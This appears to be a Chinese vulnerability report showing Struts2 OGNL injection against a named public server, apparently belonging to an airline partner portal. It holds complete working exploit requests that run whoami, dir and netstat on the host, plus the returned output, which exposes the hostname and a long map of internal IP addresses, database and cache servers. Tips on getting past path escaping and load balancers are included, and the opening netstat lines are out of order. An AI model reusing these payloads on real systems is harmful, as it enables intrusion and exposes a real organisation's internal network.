TCP 127.0.0.1:1469 127.0.0.1:1470 ESTABLISHED 6212
TCP 127.0.0.1:1470 127.0.0.1:1469 ESTABLISHED 6212
TCP 127.0.0.1:1471 127.0.0.1:1472 ESTABLISHED 6212
TCP 127.0.0.1:1472 127.0.0.1:1471 ESTABLISHED 6212
TCP 127.0.0.1:1473 127.0.0.1:1474 ESTABLISHED 6212
TCP 127.0.0.1:1474 127.0.0.1:1473 ESTABLISHED 6212
TCP 127.0.0.1:1475 127.0.0.1:1477 ESTABLISHED 6212
TCP 127.0.0.1:1477 127.0.0.1:1475 ESTABLISHED 6212
TCP 127.0.0.1:1478 127.0.0.1:1479 ESTABLISHED 6212
TCP 127.0.0.1:1479 127.0.0.1:1478 ESTABLISHED 6212
TCP 127.0.0.1:1480 127.0.0.1:1481 ESTABLISHED 6212
TCP 127.0.0.1:1481 127.0.0.1:1480 ESTABLISHED 6212
TCP 127.0.0.1:1482 127.0.0.1:1483 ESTABLISHED 6212
TCP 127.0.0.1:1483 127.0.0.1:1482 ESTABLISHED 6212
TCP 127.0.0.1:5152 0.0.0.0:0 LISTENING 1248
TCP 127.0.0.1:8005 0.0.0.0:0 LISTENING 5696
TCP 127.0.0.1:8065 0.0.0.0:0 LISTENING 5316
TCP 127.0.0.1:8085 0.0.0.0:0 LISTENING 1748
TCP 127.0.0.1:8181 0.0.0.0:0 LISTENING 8792
TCP 127.0.0.1:9005 0.0.0.0:0 LISTENING 6212
UDP 0.0.0.0:161 *:* 1764
UDP 0.0.0.0:445 *:* 4
UDP 0.0.0.0:500 *:* 484
UDP 0.0.0.0:2425 *:* 4680
UDP 0.0.0.0:4446 *:* 5696
UDP 0.0.0.0:4446 *:* 5696
UDP 0.0.0.0:4446 *:* 6212
UDP 0.0.0.0:4446 *:* 6212
UDP 0.0.0.0:4500 *:* 484
UDP 0.0.0.0:4646 *:* 4680
UDP 0.0.0.0:45564 *:* 6212
UDP 0.0.0.0:45564 *:* 5696
UDP 10.12.66.29:123 *:* 812
UDP 10.12.66.29:137 *:* 4
UDP 10.12.66.29:138 *:* 4
UDP 127.0.0.1:123 *:* 812
UDP 127.0.0.1:1032 *:* 2424


影响内网安全

POC

ST2这里有一个地方需要突破一下,用工具是不行的。
漏洞地址:http://113.108.100.142/weballiance/cooperateCode!goSearchDemo255_300.action

1.jpg


存在漏洞。
查看下主机名。

2.jpg


POST /weballiance/cooperateCode!goSearchDemo255_300.action?selColor=blue&weballiancecode=L20120515152239892420 HTTP/1.1
User-Agent: Mozilla/5.0 (baidu spider)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Content-Length: 624
Host: 113.108.100.142
Connection: Keep-Alive
Pragma: no-cache
Cookie:
redirect:${%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23s%3dnew%20java.util.Scanner((new%20java.lang.ProcessBuilder(%27whoami%27.toString().split(%27\\s%27))).start().getInputStream()).useDelimiter(%27\\A%27),%23str%3d%23s.hasNext()?%23s.next():%27%27,%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().println(%23str),%23resp.getWriter().flush(),%23resp.getWriter().close()}


ppsc2\shenzhenair


这里有2个负载均衡,也有一些防护设备。上传文件请上传两次才能保证每台上面都有上传文件。

3.jpg


这里工具不能执行dir 命令。因为有\ /的问题,所以要自己去提交。(这个很基础,也很使用,在7.0下面经常会遇到这个问题)代码:

POST /weballiance/cooperateCode!goSearchDemo255_300.action?selColor=blue&weballiancecode=L20120515152239892420 HTTP/1.1
User-Agent: Mozilla/5.0 (baidu spider)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Content-Length: 683
Host: 113.108.100.142
Connection: Keep-Alive
Pragma: no-cache
Cookie:
redirect:${%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23s%3dnew%20java.util.Scanner((new%20java.lang.ProcessBuilder(%27cmd.exe /c dir /a /od D:\\apache\\apache-tomcat-7.0.32-A\\webapps%27.toString().split(%27\\s%27))).start().getInputStream()).useDelimiter(%27\\A%27),%23str%3d%23s.hasNext()?%23s.next():%27%27,%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().println(%23str),%23resp.getWriter().flush(),%23resp.getWriter().close()}


POST /weballiance/cooperateCode!goSearchDemo255_300.action?selColor=blue&weballiancecode=L20120515152239892420 HTTP/1.1
User-Agent: Mozilla/5.0 (baidu spider)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Content-Length: 641
Host: 113.108.100.142
Connection: Keep-Alive
Pragma: no-cache
Cookie:
redirect:${%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23s%3dnew%20java.util.Scanner((new%20java.lang.ProcessBuilder(%27cmd.exe /c netstat -ano%27.toString().split(%27\\s%27))).start().getInputStream()).useDelimiter(%27\\A%27),%23str%3d%23s.hasNext()?%23s.next():%27%27,%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().println(%23str),%23resp.getWriter().flush(),%23resp.getWriter().close()}


HTTP/1.1 200 OK
Date: Mon, 13 Jun 2016 02:39:42 GMT
Server: Apache/2.2.22 (Win32) mod_jk/1.2.37
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/plain
Content-Length: 28721
Active Connections
Proto Local Address Foreign Address State PID
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 8500
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 724
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:1025 0.0.0.0:0 LISTENING 484
TCP 0.0.0.0:1029 0.0.0.0:0 LISTENING 1292
TCP 0.0.0.0:1030 0.0.0.0:0 LISTENING 1292
TCP 0.0.0.0:1920 0.0.0.0:0 LISTENING 1292
TCP 0.0.0.0:2425 0.0.0.0:0 LISTENING 4680
TCP 0.0.0.0:2428 0.0.0.0:0 LISTENING 4680
TCP 0.0.0.0:2621 0.0.0.0:0 LISTENING 5696
TCP 0.0.0.0:2625 0.0.0.0:0 LISTENING 5696
TCP 0.0.0.0:3389 0.0.0.0:0 LISTENING 2104
TCP 0.0.0.0:3661 0.0.0.0:0 LISTENING 1292
TCP 0.0.0.0:4026 0.0.0.0:0 LISTENING 6212
TCP 0.0.0.0:4028 0.0.0.0:0 LISTENING 6212
TCP 0.0.0.0:5800 0.0.0.0:0 LISTENING 2136
TCP 0.0.0.0:5900 0.0.0.0:0 LISTENING 2136
TCP 0.0.0.0:6014 0.0.0.0:0 LISTENING 1292
TCP 0.0.0.0:6129 0.0.0.0:0 LISTENING 1148
TCP 0.0.0.0:8009 0.0.0.0:0 LISTENING 5696
TCP 0.0.0.0:8068 0.0.0.0:0 LISTENING 5316
TCP 0.0.0.0:8069 0.0.0.0:0 LISTENING 5316
TCP 0.0.0.0:8080 0.0.0.0:0 LISTENING 5696
TCP 0.0.0.0:8081 0.0.0.0:0 LISTENING 6212
TCP 0.0.0.0:8088 0.0.0.0:0 LISTENING 1748
TCP 0.0.0.0:8089 0.0.0.0:0 LISTENING 1748
TCP 0.0.0.0:8098 0.0.0.0:0 LISTENING 8792
TCP 0.0.0.0:8119 0.0.0.0:0 LISTENING 8792
TCP 0.0.0.0:9009 0.0.0.0:0 LISTENING 6212
TCP 0.0.0.0:38888 0.0.0.0:0 LISTENING 2044
TCP 10.12.66.29:80 210.75.21.99:47177 ESTABLISHED 5836
TCP 10.12.66.29:139 0.0.0.0:0 LISTENING 4
TCP 10.12.66.29:1044 10.11.108.43:9080 CLOSE_WAIT 1748
TCP 10.12.66.29:1133 10.12.66.33:1521 ESTABLISHED 8792
TCP 10.12.66.29:1282 10.12.66.33:1521 ESTABLISHED 5316
TCP 10.12.66.29:1289 10.12.66.33:1521 ESTABLISHED 1748
TCP 10.12.66.29:1315 10.12.66.33:1521 ESTABLISHED 1748
TCP 10.12.66.29:1334 59.151.45.134:80 CLOSE_WAIT 1748
TCP 10.12.66.29:1367 10.12.66.33:1521 ESTABLISHED 8792
TCP 10.12.66.29:1369 10.12.66.33:1521 ESTABLISHED 1748
TCP 10.12.66.29:1407 10.11.102.107:11211 ESTABLISHED 5696
TCP 10.12.66.29:1408 10.11.102.107:11211 ESTABLISHED 5696
TCP 10.12.66.29:1409 10.11.102.107:11211 ESTABLISHED 5696
TCP 10.12.66.29:1410 10.11.102.107:11211 ESTABLISHED 5696
TCP 10.12.66.29:1411 10.11.102.107:11211 ESTABLISHED 5696
TCP 10.12.66.29:1412 10.11.102.107:11211 ESTABLISHED 5696
TCP 10.12.66.29:1413 10.11.102.107:11211 ESTABLISHED 5696
TCP 10.12.66.29:1414 10.11.102.107:11211 ESTABLISHED 5696
TCP 10.12.66.29:1415 10.11.102.107:11211 ESTABLISHED 5696
TCP 10.12.66.29:1416 10.11.102.107:11211 ESTABLISHED 5696
TCP 10.12.66.29:1417 10.11.102.107:11211 ESTABLISHED 5696
TCP 10.12.66.29:1418 10.11.102.107:11211 ESTABLISHED 5696
TCP 10.12.66.29:1419 10.11.102.107:11211 ESTABLISHED 5696
TCP 10.12.66.29:1420 10.11.102.107:11211 ESTABLISHED 5696
TCP 10.12.66.29:1421 10.11.102.107:11211 ESTABLISHED 5696
TCP 10.12.66.29:1422 10.11.102.107:11211 ESTABLISHED 5696
TCP 10.12.66.29:1423 10.11.102.107:11211 ESTABLISHED 5696
TCP 10.12.66.29:1424 10.11.102.107:11211 ESTABLISHED 5696
TCP 10.12.66.29:1425 10.11.102.107:11211 ESTABLISHED 5696
TCP 10.12.66.29:1426 10.11.102.107:11211 ESTABLISHED 5696
TCP 10.12.66.29:1427 10.11.102.107:11211 ESTABLISHED 5696
TCP 10.12.66.29:1428 10.11.102.107:11211 ESTABLISHED 5696
TCP 10.12.66.29:1429 10.11.102.107:11211 ESTABLISHED 5696
TCP 10.12.66.29:1430 10.11.102.107:11211 ESTABLISHED 5696
TCP 10.12.66.29:1431 10.11.102.107:11211 ESTABLISHED 5696
TCP 10.12.66.29:1432 10.11.102.107:11211 ESTABLISHED 5696
TCP 10.12.66.29:1433 10.11.102.107:11211 ESTABLISHED 5696
TCP 10.12.66.29:1434 10.11.102.107:11211 ESTABLISHED 5696
TCP 10.12.66.29:1435 10.11.102.107:11211 ESTABLISHED 5696
TCP 10.12.66.29:1436 10.11.102.107:11211 ESTABLISHED 5696
TCP 10.12.66.29:1437 10.11.102.107:11211 ESTABLISHED 5696
TCP 10.12.66.29:1438 10.11.102.107:11211 ESTABLISHED 5696
TCP 10.12.66.29:1439 10.11.102.107:11211 ESTABLISHED 5696
TCP 10.12.66.29:1440 10.11.102.107:11211 ESTABLISHED 5696
TCP 10.12.66.29:1441 10.11.102.107:11211 ESTABLISHED 5696
TCP 10.12.66.29:1442 10.11.102.107:11211 ESTABLISHED 5696
TCP 10.12.66.29:1443 10.11.102.107:11211 ESTABLISHED 5696
TCP 10.12.66.29:1444 10.11.102.107:11211 ESTABLISHED 5696
TCP 10.12.66.29:1445 10.11.102.107:11211 ESTABLISHED 5696
TCP 10.12.66.29:1446 10.11.102.107:11211 ESTABLISHED 5696
TCP 10.12.66.29:1447 10.11.102.107:11211 ESTABLISHED 5696
TCP 10.12.66.29:1448 10.11.102.107:11211 ESTABLISHED 5696
TCP 10.12.66.29:1449 10.11.102.107:11211 ESTABLISHED 5696
TCP 10.12.66.29:1450 10.11.102.107:11211 ESTABLISHED 5696
TCP 10.12.66.29:1451 10.11.102.107:11211 ESTABLISHED 5696
TCP 10.12.66.29:1452 10.11.102.107:11211 ESTABLISHED 5696
TCP 10.12.66.29:1453 10.11.102.107:11211 ESTABLISHED 5696
TCP 10.12.66.29:1454 10.11.102.107:11211 ESTABLISHED 5696
TCP 10.12.66.29:1455 10.11.102.107:11211 ESTABLISHED 5696
TCP 10.12.66.29:1456 10.11.102.107:11211 ESTABLISHED 5696
TCP 10.12.66.29:1457 10.12.66.33:1521 ESTABLISHED 5696
TCP 10.12.66.29:1458 10.12.66.33:1521 ESTABLISHED 5696
TCP 10.12.66.29:1459 10.12.66.33:1521 ESTABLISHED 5696
TCP 10.12.66.29:1460 10.12.66.33:1521 ESTABLISHED 5696
TCP 10.12.66.29:1461 10.12.66.33:1521 ESTABLISHED 5696
TCP 10.12.66.29:1462 10.12.66.33:1521 ESTABLISHED 5696
TCP 10.12.66.29:1463 10.12.66.33:1521 ESTABLISHED 5696
TCP 10.12.66.29:1464 10.12.66.33:1521 ESTABLISHED 5696
TCP 10.12.66.29:1465 10.12.66.33:1521 ESTABLISHED 5696
TCP 10.12.66.29:1466 10.12.66.33:1521 ESTABLISHED 5696
TCP 10.12.66.29:1484 10.11.102.107:11211 ESTABLISHED 6212
TCP 10.12.66.29:1485 10.11.102.107:11211 ESTABLISHED 6212
TCP 10.12.66.29:1486 10.11.102.107:11211 ESTABLISHED 6212
TCP 10.12.66.29:1487 10.11.102.107:11211 ESTABLISHED 6212
TCP 10.12.66.29:1488 10.11.102.107:11211 ESTABLISHED 6212
TCP 10.12.66.29:1489 10.11.102.107:11211 ESTABLISHED 6212
TCP 10.12.66.29:1490 10.11.102.107:11211 ESTABLISHED 6212
TCP 10.12.66.29:1491 10.11.102.107:11211 ESTABLISHED 6212
TCP 10.12.66.29:1492 10.11.102.107:11211 ESTABLISHED 6212
TCP 10.12.66.29:1493 10.11.102.107:11211 ESTABLISHED 6212
TCP 10.12.66.29:1494 10.11.102.107:11211 ESTABLISHED 6212
TCP 10.12.66.29:1495 10.11.102.107:11211 ESTABLISHED 6212
TCP 10.12.66.29:1496 10.11.102.107:11211 ESTABLISHED 6212
TCP 10.12.66.29:1497 10.11.102.107:11211 ESTABLISHED 6212
TCP 10.12.66.29:1498 10.11.102.107:11211 ESTABLISHED 6212
TCP 10.12.66.29:1499 10.11.102.107:11211 ESTABLISHED 6212
TCP 10.12.66.29:1500 10.11.102.107:11211 ESTABLISHED 6212
TCP 10.12.66.29:1501 10.11.102.107:11211 ESTABLISHED 6212
TCP 10.12.66.29:1502 10.11.102.107:11211 ESTABLISHED 6212
TCP 10.12.66.29:1503 10.11.102.107:11211 ESTABLISHED 6212
TCP 10.12.66.29:1504 10.11.102.107:11211 ESTABLISHED 6212
TCP 10.12.66.29:1505 10.11.102.107:11211 ESTABLISHED 6212
TCP 10.12.66.29:1506 10.11.102.107:11211 ESTABLISHED 6212
TCP 10.12.66.29:1507 10.11.102.107:11211 ESTABLISHED 6212
TCP 10.12.66.29:1508 10.11.102.107:11211 ESTABLISHED 6212
TCP 10.12.66.29:1509 10.11.102.107:11211 ESTABLISHED 6212
TCP 10.12.66.29:1510 10.11.102.107:11211 ESTABLISHED 6212
TCP 10.12.66.29:1511 10.11.102.107:11211 ESTABLISHED 6212
TCP 10.12.66.29:1512 10.11.102.107:11211 ESTABLISHED 6212
TCP 10.12.66.29:1513 10.11.102.107:11211 ESTABLISHED 6212
TCP 10.12.66.29:1514 10.11.102.107:11211 ESTABLISHED 6212
TCP 10.12.66.29:1515 10.11.102.107:11211 ESTABLISHED 6212
TCP 10.12.66.29:1516 10.11.102.107:11211 ESTABLISHED 6212
TCP 10.12.66.29:1517 10.11.102.107:11211 ESTABLISHED 6212
TCP 10.12.66.29:1518 10.11.102.107:11211 ESTABLISHED 6212
TCP 10.12.66.29:1519 10.11.102.107:11211 ESTABLISHED 6212
TCP 10.12.66.29:1520 10.11.102.107:11211 ESTABLISHED 6212
TCP 10.12.66.29:1521 10.11.102.107:11211 ESTABLISHED 6212
TCP 10.12.66.29:1522 10.11.102.107:11211 ESTABLISHED 6212
TCP 10.12.66.29:1523 10.11.102.107:11211 ESTABLISHED 6212
TCP 10.12.66.29:1524 10.11.102.107:11211 ESTABLISHED 6212
TCP 10.12.66.29:1525 10.11.102.107:11211 ESTABLISHED 6212
TCP 10.12.66.29:1526 10.11.102.107:11211 ESTABLISHED 6212
TCP 10.12.66.29:1527 10.11.102.107:11211 ESTABLISHED 6212
TCP 10.12.66.29:1528 10.11.102.107:11211 ESTABLISHED 6212
TCP 10.12.66.29:1529 10.11.102.107:11211 ESTABLISHED 6212
TCP 10.12.66.29:1530 10.11.102.107:11211 ESTABLISHED 6212
TCP 10.12.66.29:1531 10.11.102.107:11211 ESTABLISHED 6212
TCP 10.12.66.29:1532 10.11.102.107:11211 ESTABLISHED 6212
TCP 10.12.66.29:1533 10.11.102.107:11211 ESTABLISHED 6212
TCP 10.12.66.29:1534 10.12.66.33:1521 ESTABLISHED 6212
TCP 10.12.66.29:1535 10.12.66.33:1521 ESTABLISHED 6212
TCP 10.12.66.29:1536 10.12.66.33:1521 ESTABLISHED 6212
TCP 10.12.66.29:1537 10.12.66.33:1521 ESTABLISHED 6212
TCP 10.12.66.29:1538 10.12.66.33:1521 ESTABLISHED 6212
TCP 10.12.66.29:1539 10.12.66.33:1521 ESTABLISHED 6212
TCP 10.12.66.29:1540 10.12.66.33:1521 ESTABLISHED 6212
TCP 10.12.66.29:1541 10.12.66.33:1521 ESTABLISHED 6212
TCP 10.12.66.29:1542 10.12.66.33:1521 ESTABLISHED 6212
TCP 10.12.66.29:1543 10.12.66.33:1521 ESTABLISHED 6212
TCP 10.12.66.29:1577 10.12.66.33:1521 ESTABLISHED 8792
TCP 10.12.66.29:1578 59.151.44.157:80 CLOSE_WAIT 8792
TCP 10.12.66.29:1615 10.12.66.29:8009 ESTABLISHED 5836
TCP 10.12.66.29:1616 10.12.66.29:8009 ESTABLISHED 5836
TCP 10.12.66.29:1617 10.12.66.29:8009 ESTABLISHED 5836
TCP 10.12.66.29:1618 10.12.66.29:8009 ESTABLISHED 5836
TCP 10.12.66.29:1619 10.12.66.29:8009 ESTABLISHED 5836
TCP 10.12.66.29:1626 10.12.66.33:1521 ESTABLISHED 8792
TCP 10.12.66.29:1677 10.11.102.107:9001 CLOSE_WAIT 6212
TCP 10.12.66.29:1702 10.12.66.29:9009 ESTABLISHED 5836
TCP 10.12.66.29:1703 10.12.66.29:9009 ESTABLISHED 5836
TCP 10.12.66.29:1705 10.12.66.29:9009 ESTABLISHED 5836
TCP 10.12.66.29:1706 10.12.66.29:9009 ESTABLISHED 5836
TCP 10.12.66.29:1727 10.11.103.83:9081 CLOSE_WAIT 8792
TCP 10.12.66.29:1792 59.151.45.134:80 CLOSE_WAIT 1748
TCP 10.12.66.29:1815 10.110.10.71:8014 ESTABLISHED 2424
TCP 10.12.66.29:1822 10.12.66.29:8009 ESTABLISHED 5836
TCP 10.12.66.29:1823 10.12.66.29:8009 ESTABLISHED 5836
TCP 10.12.66.29:1824 10.12.66.29:8009 ESTABLISHED 5836
TCP 10.12.66.29:1825 10.12.66.29:8009 ESTABLISHED 5836
TCP 10.12.66.29:1830 10.12.66.33:1521 ESTABLISHED 5316
TCP 10.12.66.29:1836 10.11.108.43:9080 CLOSE_WAIT 1748
TCP 10.12.66.29:1837 10.12.66.33:1521 ESTABLISHED 1748
TCP 10.12.66.29:1838 59.151.45.134:80 ESTABLISHED 1748
TCP 10.12.66.29:1840 61.155.159.101:80 TIME_WAIT 0
TCP 10.12.66.29:1841 61.155.159.101:80 TIME_WAIT 0
TCP 10.12.66.29:1842 140.206.211.15:443 TIME_WAIT 0
TCP 10.12.66.29:1843 140.206.211.15:443 TIME_WAIT 0
TCP 10.12.66.29:1844 140.206.211.15:443 TIME_WAIT 0
TCP 10.12.66.29:1845 10.11.108.43:9080 CLOSE_WAIT 5316
TCP 10.12.66.29:1846 140.206.211.15:443 TIME_WAIT 0
TCP 10.12.66.29:1847 120.132.34.101:80 CLOSE_WAIT 8792
TCP 10.12.66.29:1848 63.88.100.162:80 CLOSE_WAIT 2728
TCP 10.12.66.29:1849 10.11.108.43:9080 CLOSE_WAIT 8792
TCP 10.12.66.29:1850 61.155.159.101:80 TIME_WAIT 0
TCP 10.12.66.29:1852 61.155.159.101:80 TIME_WAIT 0
TCP 10.12.66.29:1853 10.12.66.29:4028 TIME_WAIT 0
TCP 10.12.66.29:1854 10.12.66.113:139 TIME_WAIT 0
TCP 10.12.66.29:1855 10.12.66.113:139 TIME_WAIT 0
TCP 10.12.66.29:1856 10.12.66.29:4028 TIME_WAIT 0
TCP 10.12.66.29:1857 10.12.66.28:4083 TIME_WAIT 0
TCP 10.12.66.29:1858 10.12.66.28:4150 TIME_WAIT 0
TCP 10.12.66.29:1859 10.12.66.31:4045 TIME_WAIT 0
TCP 10.12.66.29:1860 10.12.66.31:3755 TIME_WAIT 0
TCP 10.12.66.29:1861 10.12.66.29:2625 TIME_WAIT 0
TCP 10.12.66.29:1862 61.155.159.101:80 TIME_WAIT 0
TCP 10.12.66.29:1863 103.37.152.53:80 ESTABLISHED 5316
TCP 10.12.66.29:1864 10.11.103.83:9081 ESTABLISHED 1748
TCP 10.12.66.29:1900 92.123.143.249:80 CLOSE_WAIT 3808
TCP 10.12.66.29:2334 63.110.60.17:80 CLOSE_WAIT 9436
TCP 10.12.66.29:2621 10.12.66.28:2199 ESTABLISHED 5696
TCP 10.12.66.29:2621 10.12.66.28:2200 ESTABLISHED 5696
TCP 10.12.66.29:2621 10.12.66.29:4051 ESTABLISHED 5696
TCP 10.12.66.29:2621 10.12.66.31:8304 ESTABLISHED 5696
TCP 10.12.66.29:2621 10.12.66.31:8305 ESTABLISHED 5696
TCP 10.12.66.29:2621 10.12.66.31:8306 ESTABLISHED 5696
TCP 10.12.66.29:2621 10.12.66.31:8307 ESTABLISHED 5696
TCP 10.12.66.29:2629 96.7.54.97:80 CLOSE_WAIT 9160
TCP 10.12.66.29:2632 10.12.66.31:3761 ESTABLISHED 5696
TCP 10.12.66.29:2636 10.12.66.31:3753 ESTABLISHED 5696
TCP 10.12.66.29:2638 10.12.66.31:4051 ESTABLISHED 5696
TCP 10.12.66.29:2640 10.12.66.28:4148 ESTABLISHED 5696
TCP 10.12.66.29:2642 10.12.66.28:4081 ESTABLISHED 5696
TCP 10.12.66.29:2644 10.12.66.31:4043 ESTABLISHED 5696
TCP 10.12.66.29:2780 10.12.65.51:6014 ESTABLISHED 1292
TCP 10.12.66.29:3031 59.151.45.134:80 CLOSE_WAIT 1748
TCP 10.12.66.29:3225 10.12.65.60:1918 ESTABLISHED 1292
TCP 10.12.66.29:3282 10.12.66.29:9009 ESTABLISHED 5836
TCP 10.12.66.29:3586 120.132.34.101:80 CLOSE_WAIT 8792
TCP 10.12.66.29:3653 10.12.66.33:1521 ESTABLISHED 8792
TCP 10.12.66.29:3669 10.12.66.33:1521 ESTABLISHED 5316
TCP 10.12.66.29:3676 10.12.66.33:1521 ESTABLISHED 8792
TCP 10.12.66.29:3677 10.12.66.33:1521 ESTABLISHED 8792
TCP 10.12.66.29:3712 59.151.45.134:80 CLOSE_WAIT 1748
TCP 10.12.66.29:3722 10.12.66.33:1521 ESTABLISHED 1748
TCP 10.12.66.29:3771 10.12.66.33:1521 ESTABLISHED 5316
TCP 10.12.66.29:3817 10.12.66.33:1521 ESTABLISHED 1748
TCP 10.12.66.29:3822 10.12.66.33:1521 ESTABLISHED 5316
TCP 10.12.66.29:3945 10.12.66.33:1521 ESTABLISHED 5316
TCP 10.12.66.29:3970 10.12.66.33:1521 ESTABLISHED 8792
TCP 10.12.66.29:3990 10.12.66.33:1521 ESTABLISHED 5316
TCP 10.12.66.29:4011 10.12.66.33:1521 ESTABLISHED 8792
TCP 10.12.66.29:4026 10.12.66.28:2613 ESTABLISHED 6212
TCP 10.12.66.29:4026 10.12.66.28:2614 ESTABLISHED 6212
TCP 10.12.66.29:4026 10.12.66.29:4032 ESTABLISHED 6212
TCP 10.12.66.29:4026 10.12.66.31:11191 ESTABLISHED 6212
TCP 10.12.66.29:4026 10.12.66.31:11192 ESTABLISHED 6212
TCP 10.12.66.29:4026 10.12.66.31:11193 ESTABLISHED 6212
TCP 10.12.66.29:4026 10.12.66.31:11194 ESTABLISHED 6212
TCP 10.12.66.29:4032 10.12.66.29:4026 ESTABLISHED 5696
TCP 10.12.66.29:4034 10.12.66.31:3761 ESTABLISHED 6212
TCP 10.12.66.29:4036 10.12.66.31:3753 ESTABLISHED 6212
TCP 10.12.66.29:4038 10.12.66.31:4051 ESTABLISHED 6212
TCP 10.12.66.29:4042 10.12.66.28:4081 ESTABLISHED 6212
TCP 10.12.66.29:4045 10.12.66.28:4148 ESTABLISHED 6212
TCP 10.12.66.29:4049 10.12.66.31:4043 ESTABLISHED 6212
TCP 10.12.66.29:4051 10.12.66.29:2621 ESTABLISHED 6212
TCP 10.12.66.29:4060 10.12.66.33:1521 ESTABLISHED 5316
TCP 10.12.66.29:4110 10.12.66.33:1521 ESTABLISHED 1748
TCP 10.12.66.29:4239 10.12.66.33:1521 ESTABLISHED 5316
TCP 10.12.66.29:4327 10.12.66.33:1521 ESTABLISHED 1748
TCP 10.12.66.29:4415 59.151.45.134:80 CLOSE_WAIT 1748
TCP 10.12.66.29:4416 59.151.45.134:80 CLOSE_WAIT 1748
TCP 10.12.66.29:4503 10.12.66.33:1521 ESTABLISHED 8792
TCP 10.12.66.29:4533 10.12.66.29:9009 ESTABLISHED 5836
TCP 10.12.66.29:4661 10.12.66.29:8009 ESTABLISHED 5836
TCP 10.12.66.29:4736 10.12.66.29:9009 ESTABLISHED 5836
TCP 10.12.66.29:4737 10.12.66.29:9009 ESTABLISHED 5836
TCP 10.12.66.29:4761 10.12.66.33:1521 ESTABLISHED 1748
TCP 10.12.66.29:4763 10.12.66.33:1521 ESTABLISHED 1748
TCP 10.12.66.29:4794 10.11.103.83:9081 CLOSE_WAIT 1748
TCP 10.12.66.29:4803 10.12.66.33:1521 ESTABLISHED 5316
TCP 10.12.66.29:4813 10.12.66.33:1521 ESTABLISHED 8792
TCP 10.12.66.29:4920 10.12.66.33:1521 ESTABLISHED 1748
TCP 10.12.66.29:4950 10.12.66.29:9009 ESTABLISHED 5836
TCP 10.12.66.29:4957 10.12.66.33:1521 ESTABLISHED 5316
TCP 10.12.66.29:4966 10.12.66.33:1521 ESTABLISHED 8792
TCP 10.12.66.29:5002 0.0.0.0:0 LISTENING 5696
TCP 10.12.66.29:5003 0.0.0.0:0 LISTENING 6212
TCP 10.12.66.29:8009 10.12.66.29:1615 ESTABLISHED 5696
TCP 10.12.66.29:8009 10.12.66.29:1616 ESTABLISHED 5696
TCP 10.12.66.29:8009 10.12.66.29:1617 ESTABLISHED 5696
TCP 10.12.66.29:8009 10.12.66.29:1618 ESTABLISHED 5696
TCP 10.12.66.29:8009 10.12.66.29:1619 ESTABLISHED 5696
TCP 10.12.66.29:8009 10.12.66.29:1822 ESTABLISHED 5696
TCP 10.12.66.29:8009 10.12.66.29:1823 ESTABLISHED 5696
TCP 10.12.66.29:8009 10.12.66.29:1824 ESTABLISHED 5696
TCP 10.12.66.29:8009 10.12.66.29:1825 ESTABLISHED 5696
TCP 10.12.66.29:8009 10.12.66.29:4661 ESTABLISHED 5696
TCP 10.12.66.29:8088 10.11.102.104:4121 TIME_WAIT 0
TCP 10.12.66.29:8088 10.11.102.104:4150 TIME_WAIT 0
TCP 10.12.66.29:8088 10.11.102.104:4157 FIN_WAIT_2 1748
TCP 10.12.66.29:8088 10.11.102.104:4219 FIN_WAIT_2 1748
TCP 10.12.66.29:8088 10.11.102.104:4246 ESTABLISHED 1748
TCP 10.12.66.29:8088 10.11.102.104:4248 ESTABLISHED 1748
TCP 10.12.66.29:8088 10.12.67.28:3276 FIN_WAIT_2 1748
TCP 10.12.66.29:8088 59.151.29.91:61523 TIME_WAIT 0
TCP 10.12.66.29:8088 59.151.29.91:61599 TIME_WAIT 0
TCP 10.12.66.29:8088 59.151.29.91:61642 TIME_WAIT 0
TCP 10.12.66.29:8088 59.151.29.91:61826 TIME_WAIT 0
TCP 10.12.66.29:8088 59.151.29.91:62296 TIME_WAIT 0
TCP 10.12.66.29:8088 59.151.29.91:62457 TIME_WAIT 0
TCP 10.12.66.29:8088 59.151.29.91:62727 TIME_WAIT 0
TCP 10.12.66.29:9009 10.12.66.29:1702 ESTABLISHED 6212
TCP 10.12.66.29:9009 10.12.66.29:1703 ESTABLISHED 6212
TCP 10.12.66.29:9009 10.12.66.29:1705 ESTABLISHED 6212
TCP 10.12.66.29:9009 10.12.66.29:1706 ESTABLISHED 6212
TCP 10.12.66.29:9009 10.12.66.29:3282 ESTABLISHED 6212
TCP 10.12.66.29:9009 10.12.66.29:4533 ESTABLISHED 6212
TCP 10.12.66.29:9009 10.12.66.29:4736 ESTABLISHED 6212
TCP 10.12.66.29:9009 10.12.66.29:4737 ESTABLISHED 6212
TCP 10.12.66.29:9009 10.12.66.29:4950 ESTABLISHED 6212
TCP 10.12.66.29:38888 10.12.69.51:48610 ESTABLISHED 2044
TCP 127.0.0.1:1031 0.0.0.0:0 LISTENING 2500
TCP 127.0.0.1:1371 127.0.0.1:1372 ESTABLISHED 5696
TCP 127.0.0.1:1372 127.0.0.1:1371 ESTABLISHED 5696
